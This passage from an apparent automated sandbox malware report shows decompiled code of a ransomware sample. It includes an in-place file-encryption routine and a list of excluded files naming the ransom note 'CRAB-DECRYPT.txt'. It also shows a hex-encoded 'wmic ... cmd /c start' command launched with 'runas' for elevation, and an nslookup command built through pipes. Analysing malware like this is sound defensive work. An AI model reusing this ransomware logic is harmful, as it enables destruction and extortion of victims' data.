						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

0x0f143dbf
0x0f143dc1
0x0f143dc8
0x0f143dce
0x0f143dd5
0x0f143de7
0x0f143df4
0x0f143dfd
0x0f143e05
0x0f143e0d
0x0f143e15
0x0f143e1d
0x0f143e25
0x0f143e2d
0x0f143e35
0x0f143e3d
0x0f143e45
0x0f143e4d
0x0f143e55
0x0f143e5d
0x0f143e68
0x0f143e78
0x0f143e81
0x0f143e89
0x0f143e91
0x0f143e99
0x0f143ea1
0x0f143ea9
0x0f143eb1
0x0f143eb9
0x0f143ec4
0x0f143ecf
0x0f143eda
0x0f143ee5
0x0f143ef0
0x0f143efb
0x0f143f06
0x0f143f11
0x0f143f1c
0x0f143f27
0x0f143f41
0x0f143f43
0x0f143f49
0x0f143f50
0x0f143f5c
0x0f143f5e
0x0f143f65
0x0f143f6d
0x0f143f75
0x0f143f7d
0x0f143f87
0x0f143f91
0x0f143f94
0x0f143f9b
0x0f143fa2
0x0f143fb0
0x0f143fb1
0x0f143fb5
0x00000000
0x00000000
0x0f143fb7
0x0f143fbb
0x00000000
0x00000000
0x0f143fc4
0x00000000
0x0f143fc4
0x0f143fd6
0x0f143fdf
0x0f143fe7
0x0f143fe7
0x0f143dd5
0x0f143fca
0x0f143fd0

APIs

Part of subcall function 0F143CF0: _memset.LIBCMT ref: 0F143D42
Part of subcall function 0F143CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F143D66
Part of subcall function 0F143CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F143D6A
Part of subcall function 0F143CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F143D6E
Part of subcall function 0F143CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F143D95

Part of subcall function 0F143C70: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F143CA0

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0F143E5D
wsprintfW.USER32 ref: 0F143F27
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0F143F3B
GetForegroundWindow.USER32 ref: 0F143F50
ShellExecuteExW.SHELL32(00000000), ref: 0F143FB1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F143FC4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0F143FD6
CloseHandle.KERNEL32(?), ref: 0F143FDF
ExitProcess.KERNEL32 ref: 0F143FE7

Strings

y, xrefs: 0F143E15
s, xrefs: 0F143F75
p, xrefs: 0F143E68
m, xrefs: 0F143ECF
%, xrefs: 0F143F11
2, xrefs: 0F143E2D
\, xrefs: 0F143E45
, xrefs: 0F143EDA
%, xrefs: 0F143DE7
t, xrefs: 0F143F06
n, xrefs: 0F143F6D
w, xrefs: 0F143E35
s, xrefs: 0F143E89
", xrefs: 0F143EC4
r, xrefs: 0F143E05
a, xrefs: 0F143EB1
c, xrefs: 0F143E55
e, xrefs: 0F143E81
e, xrefs: 0F143E3D
r, xrefs: 0F143EA9
c, xrefs: 0F143EE5
d, xrefs: 0F143DFD
, xrefs: 0F143EA1
m, xrefs: 0F143E25
", xrefs: 0F143F1C
l, xrefs: 0F143E99
o, xrefs: 0F143E78
r, xrefs: 0F143F65
t, xrefs: 0F143E1D
i, xrefs: 0F143DF4
a, xrefs: 0F143EFB
s, xrefs: 0F143EF0
e, xrefs: 0F143EB9
\, xrefs: 0F143E0D
c, xrefs: 0F143E91

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: 500ed13ceeddfb189430dc27b055a6d569120e5f89c0ccd2393ad74c6f6f833d
Instruction ID: 8a2c26620db1cd16305a510c9b1b5b74c42c886e333c68b6e56c3cd4b2281f9b
Opcode Fuzzy Hash: 500ed13ceeddfb189430dc27b055a6d569120e5f89c0ccd2393ad74c6f6f833d
Instruction Fuzzy Hash: 985149B4108341DFE3208F50D448B5ABFF9BF84759F004A1DE69886291D7FAA5ACCF96

Uniqueness

Uniqueness Score: -1.00%

Function 0F1437B0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 320
memorystringwindowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0F1437B0(WCHAR* __ecx, void* __edx, void* __eflags) {
				long _v8;
				void* _v12;
				long _v16;
				long _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				void _v40;
				void _v44;
				signed int _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				int _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t96;
				void* _t97;
				struct HWND__* _t99;
				void* _t101;
				void* _t107;
				long _t124;
				long _t125;
				long _t128;
				WCHAR* _t145;
				void* _t147;
				void* _t149;
				void* _t151;
				WCHAR* _t162;
				void* _t163;
				void* _t164;
				void _t165;
				void* _t166;
				long _t168;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t177;

				_t145 = __ecx;
				_t166 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v32 = 0;
				_t151 = _t166;
				E0F146500(_t151, 0, 0,  &_v20,  &_v32);
				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x43002e;
				_v56 = _t162;
				_v76 = 0x410052;
				_v72 = 0x42;
				lstrcpyW(_t162, _t145);
				lstrcatW(_t162,  &_v80);
				asm("movdqa xmm0, [0xf150530]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t151);
				asm("movdqa xmm0, [0xf150530]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0xf150530]");
				asm("movdqu [ebp-0x64], xmm0");
				E0F148400( &_v104, 0x10);
				E0F148400( &_v140, 0x20);
				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v24 = _t96;
				asm("movdqu [ebx+0x10], xmm0");
				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t163 = _t97;
				_v60 = _t163;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t99 = E0F146660(_v20, _v32, _t96,  &_v88, 0x800);
				_t175 = _t173 + 0x18;
				if(_t99 != 0) {
					_t101 = E0F146660(_v20, _v32, _t163,  &_v84, 0x800);
					_t176 = _t175 + 0x14;
					if(_t101 != 0) {
						E0F148520( &_v140,  &_v388);
						_t177 = _t176 + 8;
						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
						_v28 = _t147;
						if(_t147 != 0xffffffff) {
							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
							 *_t164 = 0;
							 *(_t164 + 4) = 0;
							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
							_t168 = 0;
							_v12 = _t107;
							_v36 = 0;
							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
								_t124 = _v8;
								if(_t124 != 0) {
									_t149 = 0;
									_v64 = 0;
									_t168 =  <  ? 1 : _t168;
									 *_t164 =  *_t164 + _t124;
									asm("adc [edi+0x4], ebx");
									_t125 = _v8;
									_v48 = _t125;
									if((_t125 & 0x0000000f) != 0) {
										do {
											_t125 = _t125 + 1;
										} while ((_t125 & 0x0000000f) != 0);
										_v8 = _t125;
									}
									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
									E0F148B20(_t126, _v12, _v48);
									_t128 = _v8;
									_t177 = _t177 + 0xc;
									_v40 = _t128;
									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
										E0F1436D0(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
										_t149 = _v64;
										_t177 = _t177 + 0x10;
									}
									VirtualFree(_v68, 0, 0x8000);
									SetFilePointer(_v28,  ~_v48, 0, 1);
									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
										_t168 = 1;
										_v36 = 1;
									}
									VirtualFree(_t149, 0, 0x8000);
									_t147 = _v28;
									if(_t168 == 0) {
										_t107 = _v12;
										continue;
									}
								}
								break;
							}
							VirtualFree(_v12, 0, 0x8000);
							if(_v36 == 0) {
								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
							}
							CloseHandle(_t147);
							_v40 =  *_t164;
							VirtualFree(_t164, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							VirtualFree(_v60, 0, 0x8000);
							if(_v36 == 0) {
								MoveFileW(_v52, _v56);
							}
							_t165 = _v40;
						} else {
							VirtualFree(_t163, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x28], xmm0");
							_t165 = _v44;
						}
					} else {
						GetLastError();
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						_t165 = _v44;
					}
				} else {
					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x28], xmm0");
					_t165 = _v44;
				}
				VirtualFree(_v56, 0, 0x8000);
				return _t165;
			}

0x0f1437bb
0x0f1437bd
0x0f1437c1
0x0f1437cf
0x0f1437d8
0x0f1437e3
0x0f1437ef
0x0f1437f1
0x0f14380c
0x0f14380e
0x0f143817
0x0f14381a
0x0f143821
0x0f143828
0x0f143833
0x0f143839
0x0f143846
0x0f14384e
0x0f14384f
0x0f14385a
0x0f14385f
0x0f143863
0x0f14386b
0x0f143870
0x0f143880
0x0f143896
0x0f143898
0x0f1438ae
0x0f1438b4
0x0f1438b9
0x0f1438bc
0x0f1438c1
0x0f1438c3
0x0f1438c8
0x0f1438d3
0x0f1438d6
0x0f1438da
0x0f1438e1
0x0f1438ef
0x0f1438f4
0x0f1438f9
0x0f143937
0x0f14393c
0x0f143941
0x0f143970
0x0f143975
0x0f143993
0x0f143995
0x0f14399b
0x0f1439db
0x0f1439e9
0x0f1439ef
0x0f1439f6
0x0f1439f8
0x0f1439fa
0x0f1439fd
0x0f143a05
0x0f143a20
0x0f143a25
0x0f143a2b
0x0f143a37
0x0f143a3a
0x0f143a3d
0x0f143a3f
0x0f143a42
0x0f143a45
0x0f143a4a
0x0f143a50
0x0f143a50
0x0f143a51
0x0f143a55
0x0f143a55
0x0f143a6b
0x0f143a72
0x0f143a77
0x0f143a7a
0x0f143a7d
0x0f143a92
0x0f143aaa
0x0f143aaf
0x0f143ab2
0x0f143ab2
0x0f143abf
0x0f143ad2
0x0f143aed
0x0f143aef
0x0f143af4
0x0f143af4
0x0f143aff
0x0f143b05
0x0f143b0a
0x0f143a02
0x00000000
0x0f143a02
0x0f143b0a
0x00000000
0x0f143a25
0x0f143b20
0x0f143b26
0x0f143b37
0x0f143b4c
0x0f143b5c
0x0f143b5c
0x0f143b63
0x0f143b76
0x0f143b79
0x0f143b85
0x0f143b91
0x0f143b97
0x0f143b9f
0x0f143b9f
0x0f143ba5
0x0f14399d
0x0f1439ab
0x0f1439b7
0x0f1439b9
0x0f1439bc
0x0f1439c4
0x0f1439c4
0x0f143943
0x0f143943
0x0f14394f
0x0f143952
0x0f14395a
0x0f14395a
0x0f1438fb
0x0f143908
0x0f143914
0x0f143917
0x0f14391f
0x0f14391f
0x0f143bb2
0x0f143bbe

APIs

GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0F1437C4
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0F1437CF
VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0F14380A
lstrcpyW.KERNEL32 ref: 0F143828
lstrcatW.KERNEL32(00000000,0043002E), ref: 0F143833

Part of subcall function 0F148400: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,772966A0,00000000), ref: 0F148420
Part of subcall function 0F148400: VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 0F148448
Part of subcall function 0F148400: GetModuleHandleA.KERNEL32(?), ref: 0F14849D
Part of subcall function 0F148400: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F1484AB
Part of subcall function 0F148400: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F1484BA
Part of subcall function 0F148400: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1484DE
Part of subcall function 0F148400: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1484EC

Part of subcall function 0F148400: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F143875), ref: 0F148500
Part of subcall function 0F148400: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F143875), ref: 0F14850E

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F143896
VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F1438C1

Part of subcall function 0F146660: EnterCriticalSection.KERNEL32(0F152A48,?,0F1438F4,00000000,00000000,00000000,?,00000800), ref: 0F14666B
Part of subcall function 0F146660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0F1438F4,00000000,00000000,00000000), ref: 0F146691
Part of subcall function 0F146660: GetLastError.KERNEL32(?,0F1438F4,00000000,00000000,00000000), ref: 0F14669B
Part of subcall function 0F146660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F1438F4,00000000,00000000,00000000), ref: 0F1466B7

MessageBoxA.USER32 ref: 0F143908
GetLastError.KERNEL32 ref: 0F143943
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F143BB2

Strings

B, xrefs: 0F143821
, xrefs: 0F1438DA
., xrefs: 0F14380E
Fatal error: rsaenh.dll is not initialized as well, xrefs: 0F143902
Fatal error, xrefs: 0F1438FD
R, xrefs: 0F14381A

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
String ID: $.$B$Fatal error$Fatal error: rsaenh.dll is not initialized as well$R
API String ID: 1177701972-4284454829
Opcode ID: d2239df4d315249baa282ffdd590b046ef2cdee9d3873c7aba93cddc4ef94197
Instruction ID: 63fb65d804fdccc66e8479edd4c4325c16705e29d2ccbd0540d3ae74a9049b57
Opcode Fuzzy Hash: d2239df4d315249baa282ffdd590b046ef2cdee9d3873c7aba93cddc4ef94197
Instruction Fuzzy Hash: 09C17D71E80309ABEB118F94DC45FEEBBB8BF88B11F204115F640BA181DBB479548F64

Uniqueness

Uniqueness Score: -1.00%

Function 0F145060 Relevance: 61.4, APIs: 8, Strings: 27, Instructions: 118
pipememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F145060(CHAR* __ecx, void* __edx, WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				short _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				void* _t55;
				CHAR* _t62;
				void* _t64;

				_v72 = 0x73006e;
				_t55 = __edx;
				_v20 = 0;
				_t62 = __ecx;
				_v76 = 0;
				_v68 = 0x6f006c;
				_t41 =  !=  ?  &_v128 :  &_v72;
				_v64 = 0x6b006f;
				_a4 =  !=  ?  &_v128 :  &_v72;
				_v60 = 0x700075;
				_v56 = 0x250020;
				_v52 = 0x200053;
				_v48 = 0x73006e;
				_v44 = 0x2e0031;
				_v40 = 0x690076;
				_v36 = 0x6d0072;
				_v32 = 0x630061;
				_v28 = 0x2e0068;
				_v24 = 0x750072;
				_v128 = 0x73006e;
				_v124 = 0x6f006c;
				_v120 = 0x6b006f;
				_v116 = 0x700075;
				_v112 = 0x250020;
				_v108 = 0x200053;
				_v104 = 0x73006e;
				_v100 = 0x2e0032;
				_v96 = 0x690076;
				_v92 = 0x6d0072;
				_v88 = 0x630061;
				_v84 = 0x2e0068;
				_v80 = 0x750072;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 1;
				_v16.lpSecurityDescriptor = 0;
				_t43 = CreatePipe(0xf152a70, 0xf152a6c,  &_v16, 0);
				if(_t43 != 0) {
					_t43 = SetHandleInformation( *0xf152a70, 1, 0);
					if(_t43 == 0) {
						goto L1;
					} else {
						CreatePipe(0xf152a68, 0xf152a74,  &_v16, 0);
						_t43 = SetHandleInformation( *0xf152a74, 1, 0);
						if(_t43 == 0) {
							goto L1;
						} else {
							_t64 = VirtualAlloc(0, 0x2800, 0x3000, 4);
							if(_t64 == 0) {
								lstrcpyA(_t62, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t64, _a4, _t55);
								E0F144E10(_t64);
								E0F144FB0(_t55, _t62, _t55, _t62, _t64);
								VirtualFree(_t64, 0, 0x8000);
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t43 | 0xffffffff;
				}
			}

0x0f14506d
0x0f145078
0x0f14507b
0x0f14507f
0x0f145081
0x0f14508b
0x0f145092
0x0f145095
0x0f14509e
0x0f1450af
0x0f1450b6
0x0f1450bd
0x0f1450c4
0x0f1450cb
0x0f1450d2
0x0f1450d9
0x0f1450e0
0x0f1450e7
0x0f1450ee
0x0f1450f5
0x0f1450fc
0x0f145103
0x0f14510a
0x0f145111
0x0f145118
0x0f14511f
0x0f145126
0x0f14512d
0x0f145134
0x0f14513b
0x0f145142
0x0f145149
0x0f145150
0x0f145157
0x0f14515e
0x0f145165
0x0f14516d
0x0f145189
0x0f14518d
0x00000000
0x0f14518f
0x0f14519f
0x0f1451af
0x0f1451b3
0x00000000
0x0f1451b5
0x0f1451c9
0x0f1451cd
0x0f14520a
0x0f145218
0x0f1451cf
0x0f1451d4
0x0f1451df
0x0f1451e8
0x0f1451f5
0x0f145203
0x0f145203
0x0f1451cd
0x0f1451b3
0x0f14516f
0x0f14516f
0x0f145178
0x0f145178

APIs

CreatePipe.KERNEL32(0F152A70,0F152A6C,?,00000000,00000001,00000001,00000000), ref: 0F145165
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F145189
CreatePipe.KERNEL32(0F152A68,0F152A74,0000000C,00000000), ref: 0F14519F
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F1451AF
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0F1451C3
wsprintfW.USER32 ref: 0F1451D4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F1451F5

Strings

r, xrefs: 0F145149
h, xrefs: 0F145142
n, xrefs: 0F14511F
r, xrefs: 0F145134
fabian wosar <3, xrefs: 0F145204
a, xrefs: 0F1450E0
r, xrefs: 0F1450D9
v, xrefs: 0F14512D
l, xrefs: 0F1450FC
v, xrefs: 0F1450D2
1, xrefs: 0F1450CB
n, xrefs: 0F1450F5
l, xrefs: 0F14508B
u, xrefs: 0F14510A
n, xrefs: 0F14506D
h, xrefs: 0F1450E7
S, xrefs: 0F145118
r, xrefs: 0F1450EE
a, xrefs: 0F14513B
n, xrefs: 0F1450C4
u, xrefs: 0F1450AF
S, xrefs: 0F1450BD
o, xrefs: 0F145103
2, xrefs: 0F145126
, xrefs: 0F1450B6
, xrefs: 0F145111
o, xrefs: 0F145095

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $ $1$2$S$S$a$a$fabian wosar <3$h$h$l$l$n$n$n$n$o$o$r$r$r$r$u$u$v$v
API String ID: 1490407255-3072057902
Opcode ID: 1fa3cd6cb856cad28e37d885613d672d40c60af188271a8dc10bc390da60f05e
Instruction ID: d722508445dc225340cf302e61df0a557076f2a661f2e4eea31f0abeb45f3872
Opcode Fuzzy Hash: 1fa3cd6cb856cad28e37d885613d672d40c60af188271a8dc10bc390da60f05e
Instruction Fuzzy Hash: D9413D71E40308ABEB108F94D8487EDBFB6FF44B59F104119E914AB282C7FA55A98F94

Uniqueness

Uniqueness Score: -1.00%

Function 0F1468F0 Relevance: 31.6, APIs: 11, Strings: 10, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0F1468F0(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"CRAB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

0x0f1468f9
0x0f1468fc
0x0f146901
0x0f146903
0x0f146906
0x0f146909
0x0f14690a
0x0f146910
0x0f146910
0x0f146913
0x0f146914
0x0f146910
0x0f146924
0x0f146931
0x0f146946
0x00000000
0x0f146990
0x0f146996
0x0f14699b
0x0f1469a0
0x0f1469a0
0x0f146935
0x0f146935
0x0f14693b
0x0f14693b

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0F146B03), ref: 0F1468FC
lstrlenW.KERNEL32(00000000), ref: 0F146901
lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0F14692D
lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0F146942
lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0F14694E
lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0F14695A
lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0F146966
lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0F146972
lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0F14697E
lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0F14698A
lstrcmpiW.KERNEL32(-00000004,CRAB-DECRYPT.txt), ref: 0F146996

Strings

autorun.inf, xrefs: 0F14693C
ntuser.dat, xrefs: 0F146948
desktop.ini, xrefs: 0F146927
bootsect.bak, xrefs: 0F146960
ntuser.dat.log, xrefs: 0F146978
CRAB-DECRYPT.txt, xrefs: 0F146990
thumbs.db, xrefs: 0F146984
boot.ini, xrefs: 0F14696C
iconcache.db, xrefs: 0F146954
i)w, xrefs: 0F14691E

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
String ID: i)w$CRAB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-739155506
Opcode ID: c54e53eda536cd3f5f7bbce1ef31b519128ad282826b22c4f4168045bc070aee
Instruction ID: d274dbd2a2f5660cc9c54eb7d67d23f865e5de7e5bbb30c5988e9bfe40ec89b2
Opcode Fuzzy Hash: c54e53eda536cd3f5f7bbce1ef31b519128ad282826b22c4f4168045bc070aee
Instruction Fuzzy Hash: 4411C27268062679AA20767DDC11EEF928CAFD6A993870125F900F3103EFC5F67354B5

Uniqueness

Uniqueness Score: -1.00%

Function 0F146780 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 124
memoryCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E0F146780(void* __ecx) {
				void* _t12;
				intOrPtr* _t23;
				void* _t51;
				void* _t52;

				_t52 = __ecx;
